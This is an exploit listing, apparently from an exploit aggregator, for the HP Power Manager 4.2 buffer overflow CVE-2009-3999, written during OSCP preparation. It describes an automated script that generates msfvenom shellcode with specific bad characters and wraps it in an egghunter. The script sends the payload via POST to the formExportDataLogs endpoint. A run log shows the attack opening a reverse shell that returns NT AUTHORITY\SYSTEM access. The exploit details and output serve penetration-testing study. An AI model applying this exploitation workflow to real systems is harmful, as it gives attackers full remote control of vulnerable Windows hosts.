Share
## https://sploitus.com/exploit?id=35415784-798B-5613-B147-F357A0E245FC
As part of my OSCP preparation I came across CVE-2009-3999 (HP Power Manager 4.2 (Build 7) Buffer Overflow exploit). 

This latest script is updated to resolve Python 3 compatibility issues regarding string and byte handling, ensuring the payload is transmitted as raw binary to avoid memory mangling. 

This version features an automated msfvenom integration that dynamically generates shellcode with the correct bad characters (\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c), attaches it to a specialized Egghunter, and transmits the final payload via a POST request to the formExportDataLogs endpoint. It is designed for educational use and security auditing, simplifying the exploitation workflow by handling shellcode generation and listener startup under one hood.


      usage: python3 CVE-2009-3999.py    
      
      ┌──(venv)─(root㉿user)-[/run/…/user/2024/HTBox/kevin]
      └─# python3 exp6.py 192.168.147.45 80 192.168.45.183 4444
      [*] Generating msfvenom payload for 192.168.45.183:4444...
      [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
      [-] No arch selected, selecting arch: x86 from the payload
      Found 11 compatible encoders
      Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
      x86/shikata_ga_nai failed with Encoding failed due to a nil character
      Attempting to encode payload with 1 iterations of x86/call4_dword_xor
      x86/call4_dword_xor succeeded with size 348 (iteration=0)
      x86/call4_dword_xor chosen with final size 348
      Payload size: 348 bytes
      Final size of python file: 1953 bytes
      [+] Sending exploit to 192.168.147.45:80
      [+] Exploit sent. Starting listener on 4444...
      listening on [any] 4444 ...
      connect to [192.168.45.183] from (UNKNOWN) [192.168.147.45] 49168
      Microsoft Windows [Version 6.1.7600]
      Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
      
      C:\Windows\system32>whoami
      whoami
      nt authority\system